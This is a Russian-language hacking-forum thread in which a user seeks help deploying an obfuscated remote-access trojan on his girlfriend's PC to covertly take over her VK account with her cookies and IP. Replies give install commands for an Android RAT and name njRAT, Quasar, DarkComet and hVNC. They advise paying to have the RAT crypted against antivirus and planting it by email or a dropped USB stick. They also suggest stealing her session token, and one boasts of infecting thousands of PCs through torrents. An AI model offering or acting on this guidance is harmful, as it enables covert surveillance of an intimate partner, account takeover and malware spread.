РКН Ратник для подруги

Karatel666

Новичок
Статус
offline
Регистрация
22.07.2021
Сообщения
4
Репутация
0
Все привет!
Вопрос у меня такой - кто может помочь (не за бесплатно конечно) помочь с знаниями ратников.
Суть в чем - требуется сделать ратник с обфускацией и тд. чтобы антики не спалили.
Закинуть через почту соответственно.
НО главное после этого с помощью него создать удаленный рабочий стол для скрытого второго пользователя
, чтобы к примеру я мог зайти к своей подруге на пк и зайти с этого стола спокойно с куками и с ее же ip в тот же vk, чтобы сервер думал что я - она.
Думаю суть ясна, и для знающих людей такое сделать - 5 минут делов.
Скамеров гамеров хуямеров мимо сразу, не тратьте время или прочу на понос ебану.
Гарант +
ЖДУ ОТВЕТОВ.
 

xam111

Главный модератор
Модератор
Статус
offline
Регистрация
02.02.2020
Сообщения
3,145
Репутация
2,686
Все привет!
Вопрос у меня такой - кто может помочь (не за бесплатно конечно) помочь с знаниями ратников.
Суть в чем - требуется сделать ратник с обфускацией и тд. чтобы антики не спалили.
Закинуть через почту соответственно.
НО главное после этого с помощью него создать удаленный рабочий стол для скрытого второго пользователя
, чтобы к примеру я мог зайти к своей подруге на пк и зайти с этого стола спокойно с куками и с ее же ip в тот же vk, чтобы сервер думал что я - она.
Думаю суть ясна, и для знающих людей такое сделать - 5 минут делов.
Скамеров гамеров хуямеров мимо сразу, не тратьте время или прочу на понос ебану.
Гарант +
ЖДУ ОТВЕТОВ.

Android-RAT в Termux​


Установка:

apt install nodejs git
git clone https://github.com/hax4us/haxRat.git
cd haxRat/server
npm install
mkdir ~/haxrat

Использование:
node index.js
 

Karatel666

Новичок
Статус
offline
Регистрация
22.07.2021
Сообщения
4
Репутация
0

Android-RAT в Termux​


Установка:

apt install nodejs git
git clone https://github.com/hax4us/haxRat.git
cd haxRat/server
npm install
mkdir ~/haxrat

Использование:
node index.js
Это круто и спасибо тебе большое, но мне для пк нужен.
и желательно кто может сопроводить по этой кривой дорожке, линукс если что знаю на базовом уровне.
Но мне особо без разницы через что с ним работать, мне главное информация как что и куда сделать чтобы был профит.
 

xam111

Главный модератор
Модератор
Статус
offline
Регистрация
02.02.2020
Сообщения
3,145
Репутация
2,686
сам не проверял вижу ее очень давно
про гарант не забывай
Первое время, программа будет работать бесплатно. В демонстрационном режиме.
Скрытое содержимое для пользователей: Karatel666
 

Fake2020

Резидент
Статус
offline
Регистрация
11.02.2020
Сообщения
132
Репутация
120
1. Попробуй взять любой публичный(который уже палиться антивирусами, их достаточно много на данный момент njrat, quasar...) установить себе на виртуалку(далее ее удалить снести) и потестить его вначале у себя.... Дабы ты точно был уверен что разобрался и понял весь его функционал.
2. Если все устроило то искать на бордах того кто тебе его криптанет(от 20-100$)/склеит с чем то(здесь все индивидуально) далее можешь его кидать ей на мыло/vk/ok... от имени любой подруги/препода/сотрудника по работе. Или даже так... купи новую красивую флеху... и тупо подкинь ей ее в сумку, авто, перед дверью, кинь конверт в почтовку с письмом что она ее якобы где то выиграла, Главное что бы был уверен что именно она ее найдет и она не догадается что ей ее подкинули.

Либо просто закажи это как услугу.... Что бы тебе просто потом отдали доступ в случае успеха, и вначале нужно собрать максимум инфу о ее системе.
 
Последнее редактирование:

Karatel666

Новичок
Статус
offline
Регистрация
22.07.2021
Сообщения
4
Репутация
0
1. Попробуй взять любой публичный(который уже палиться антивирусами, их достаточно много на данный момент njrat, quasar...) установить себе на виртуалку(далее ее удалить снести) и потестить его вначале у себя.... Дабы ты точно был уверен что разобрался и понял весь его функционал.
2. Если все устроило то искать на бордах того кто тебе его криптанет(от 20-100$)/склеит с чем то(здесь все индивидуально) далее можешь его кидать ей на мыло/vk/ok... от имени любой подруги/препода/сотрудника по работе. Или даже так... купи новую красивую флеху... и тупо подкинь ей ее в сумку, авто, перед дверью, кинь конверт в почтовку с письмом что она ее якобы где то выиграла, Главное что бы был уверен что именно она ее найдет и она не догадается что ей ее подкинули.

Либо просто закажи это как услугу.... Что бы тебе просто потом отдали доступ в случае успеха, и вначале нужно собрать максимум инфу о ее системе.
Вот, уже это нравится, спасибо за ответ.
Но вопрос- с ратником на вирте я уже ознакомился и все понял, каким образом сделать так, чтобы потом открыв cmd на пк ее - сделать второго скрытого пользователя и с него юзать - это же возможно по факту.
И если можешь дать инфу где искать (или знаешь) кто закриптует/склеит?
 

Karatel666

Новичок
Статус
offline
Регистрация
22.07.2021
Сообщения
4
Репутация
0
сам не проверял вижу ее очень давно
про гарант не забывай
Первое время, программа будет работать бесплатно. В демонстрационном режиме.
Без цитаты
Окей, спасибо, проверим!
 

vvnnbbnbn

Заблокированные
Статус
offline
Регистрация
13.05.2021
Сообщения
34
Репутация
10
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.

sergey137

Резидент
Статус
offline
Регистрация
11.11.2019
Сообщения
121
Репутация
97
Для пк под твои условия будет дорого стоить. Скрытый удаленный рабочий стол это тебе надо hrdp/hvnc, стоит такая штука около 2к$ в месяц и более. Можно конечно попробовать более дешевые варианты, баксов за 300~ или бесплатные, но скорей они всего не будут полноценно работать.
 

INFERNOS

Резидент
Статус
offline
Регистрация
10.07.2018
Сообщения
175
Репутация
165
спокойно с куками и с ее же ip в тот же vk, чтобы сервер думал что я - она.
Не проще ли тупо подрезать вк токен и шляться без уведомлений там хоть круглосуточно?
Для твоих условий нужно слишком много НО, что бы пк был включен, что бы за ним никого не было и все в таком духе.
 

xam111

Главный модератор
Модератор
Статус
offline
Регистрация
02.02.2020
Сообщения
3,145
Репутация
2,686
очень давно я долго использовал(щас не знаю давно не развлекался главное скачать крысу чистую без крысы это тож поискать нужно) DarkComet
прикольная вещь полностью весь комп под тобой
склеивал всякими типа гта-5(когда ее ждали ) криптовал и на торрент))) по 2000 компов в день ловил )))
есть еще тимвиер беспалевный

 

Karatel666

Новичок
Статус
offline
Регистрация
22.07.2021
Сообщения
4
Репутация
0
Не проще ли тупо подрезать вк токен и шляться без уведомлений там хоть круглосуточно?
Для твоих условий нужно слишком много НО, что бы пк был включен, что бы за ним никого не было и все в таком духе.
вк тут как пример стоит, чтобы было ясно что таким образом попасть в соцсеть с 2-fa, я знаю что пк постоянно включен и все гуд.
Ну или каким-то образом сделать из пк жертвы прокси сервер, чтобы получив логи я мог в той же сферке подстроиться под железо и через ее же ип залететь и двухфакторка не сработала.
По этому я и тут что жду таких вот советов)))))
 

Karatel666

Новичок
Статус
offline
Регистрация
22.07.2021
Сообщения
4
Репутация
0
очень давно я долго использовал(щас не знаю давно не развлекался главное скачать крысу чистую без крысы это тож поискать нужно) DarkComet
прикольная вещь полностью весь комп под тобой
склеивал всякими типа гта-5(когда ее ждали ) криптовал и на торрент))) по 2000 компов в день ловил )))
есть еще тимвиер беспалевный

Да, его как раз и тестил, но в чем суть - каким образом с его помощью обойти двухфакторку чтобы не спалился перед сервисом?
 

INFERNOS

Резидент
Статус
offline
Регистрация
10.07.2018
Сообщения
175
Репутация
165

INFERNOS

Резидент
Статус
offline
Регистрация
10.07.2018
Сообщения
175
Репутация
165
Кинь плз статейку про это по возможности, буду благодарен, свечку поставлю даже!
Тупо вытаскиваешь токен каким либо методом, потом пихаешь его в апидог или дампер и читаешь все что тебе хочется